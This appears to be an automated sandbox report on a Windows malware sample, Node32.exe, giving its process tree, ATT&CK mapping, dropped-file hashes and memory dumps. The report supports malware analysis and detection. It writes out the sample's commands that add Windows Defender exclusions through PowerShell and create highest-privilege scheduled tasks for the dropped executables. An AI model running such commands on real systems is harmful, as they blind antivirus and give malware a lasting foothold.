C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1488
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1032

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2172

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2260

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2624

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2904

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3136

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3228
- C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe
  "C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe"
  2⤵
  - Adds Run key to start application
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:4452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3872
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4828
- - C:\Windows\System32\$Node32.exe
    "C:\Windows\System32\$Node32.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1104
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2104
- - C:\Windows\System32\$Node2Json.exe
    "C:\Windows\System32\$Node2Json.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1616
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2064
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1848
- - C:\Windows\System32\$Node3Json.exe
    "C:\Windows\System32\$Node3Json.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3460

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3832

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3884

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3968

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4168

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2668

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4072

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2368

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:1056

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3192

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
PID:1520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6903d57eed54e89b68ebb957928d1b99

SHA1
fade011fbf2e4bc044d41e380cf70bd6a9f73212

SHA256
36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52

SHA512
c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4914eb0b2ff51bfa48484b5cc8454218

SHA1
6a7c3e36ce53b42497884d4c4a3bda438dd4374b

SHA256
7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e

SHA512
83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s5ste1kb.2vs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\$Node2Json.exe

Filesize
116KB

MD5
41814c2aa6f0aaffaaaa26ffd07b3550

SHA1
ea9731c42a382ed003b5b4bfd28c3ba437c8d14a

SHA256
da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e

SHA512
f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d

Download Submit
C:\Windows\System32\$Node32.exe

Filesize
163KB

MD5
b850f016450d68da0ae4bb945355f70c

SHA1
521726c38af715e6ee1c76315151f0ed9518c6f4

SHA256
8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24

SHA512
30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c

Download Submit
C:\Windows\System32\$Node3Json.exe

Filesize
117KB

MD5
391d4f99d0076ce566b370f1572ef670

SHA1
0bf04beb77440315098bacf30563a6542e254a45

SHA256
b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605

SHA512
1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497

Download Submit
memory/484-140-0x0000022200480000-0x00000222004AA000-memory.dmp

Filesize
168KB

Download
memory/484-145-0x0000022200480000-0x00000222004AA000-memory.dmp

Filesize
168KB

Download
memory/484-146-0x00007FFD83750000-0x00007FFD83760000-memory.dmp

Filesize
64KB

Download
memory/636-116-0x00007FFD83750000-0x00007FFD83760000-memory.dmp

Filesize
64KB

Download
memory/636-115-0x000001B2092A0000-0x000001B2092CA000-memory.dmp

Filesize
168KB

Download
memory/636-110-0x000001B2092A0000-0x000001B2092CA000-memory.dmp

Filesize
168KB

Download
memory/636-109-0x000001B2092A0000-0x000001B2092CA000-memory.dmp

Filesize
168KB

Download
memory/636-108-0x000001B209270000-0x000001B209295000-memory.dmp

Filesize
148KB

Download
memory/704-125-0x000001AD7DF00000-0x000001AD7DF2A000-memory.dmp

Filesize
168KB

Download
memory/704-120-0x000001AD7DF00000-0x000001AD7DF2A000-memory.dmp

Filesize
168KB

Download
memory/704-126-0x00007FFD83750000-0x00007FFD83760000-memory.dmp

Filesize
64KB

Download
memory/728-150-0x000002D7EC4F0000-0x000002D7EC51A000-memory.dmp

Filesize
168KB

Download
memory/988-130-0x000001CD434A0000-0x000001CD434CA000-memory.dmp

Filesize
168KB

Download
memory/988-135-0x000001CD434A0000-0x000001CD434CA000-memory.dmp

Filesize
168KB

Download
memory/988-136-0x00007FFD83750000-0x00007FFD83760000-memory.dmp

Filesize
64KB

Download
memory/1104-39-0x0000027F28A80000-0x0000027F28BCF000-memory.dmp

Filesize
1.3MB

Download
memory/1264-99-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1264-94-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1264-97-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1264-105-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1264-96-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1264-103-0x00007FFDC36C0000-0x00007FFDC38C9000-memory.dmp

Filesize
2.0MB

Download
memory/1264-95-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1264-104-0x00007FFDC2C10000-0x00007FFDC2CCD000-memory.dmp

Filesize
756KB

Download
memory/1616-62-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2064-73-0x00000225365F0000-0x000002253673F000-memory.dmp

Filesize
1.3MB

Download
memory/3676-93-0x00007FFDC2C10000-0x00007FFDC2CCD000-memory.dmp

Filesize
756KB

Download
memory/3676-102-0x0000020E6A6F0000-0x0000020E6A83F000-memory.dmp

Filesize
1.3MB

Download
memory/3676-92-0x00007FFDC36C0000-0x00007FFDC38C9000-memory.dmp

Filesize
2.0MB

Download
memory/3676-91-0x0000020E6AB90000-0x0000020E6ABBA000-memory.dmp

Filesize
168KB

Download
memory/3872-14-0x00007FFDA2660000-0x00007FFDA3122000-memory.dmp

Filesize
10.8MB

Download
memory/3872-18-0x00007FFDA2660000-0x00007FFDA3122000-memory.dmp

Filesize
10.8MB

Download
memory/3872-17-0x000001E9460B0000-0x000001E9461FF000-memory.dmp

Filesize
1.3MB

Download
memory/3872-13-0x00007FFDA2660000-0x00007FFDA3122000-memory.dmp

Filesize
10.8MB

Download
memory/3872-12-0x00007FFDA2660000-0x00007FFDA3122000-memory.dmp

Filesize
10.8MB

Download
memory/3872-11-0x00007FFDA2660000-0x00007FFDA3122000-memory.dmp

Filesize
10.8MB

Download
memory/3872-10-0x000001E946020000-0x000001E946042000-memory.dmp

Filesize
136KB

Download
memory/4452-90-0x00007FFDA2660000-0x00007FFDA3122000-memory.dmp

Filesize
10.8MB

Download
memory/4452-21-0x00007FFDA2660000-0x00007FFDA3122000-memory.dmp

Filesize
10.8MB

Download
memory/4452-1-0x0000000000680000-0x00000000006E2000-memory.dmp

Filesize
392KB

Download
memory/4452-0-0x00007FFDA2663000-0x00007FFDA2665000-memory.dmp

Filesize
8KB

Download
memory/4564-89-0x0000000000120000-0x0000000000142000-memory.dmp

Filesize
136KB

Download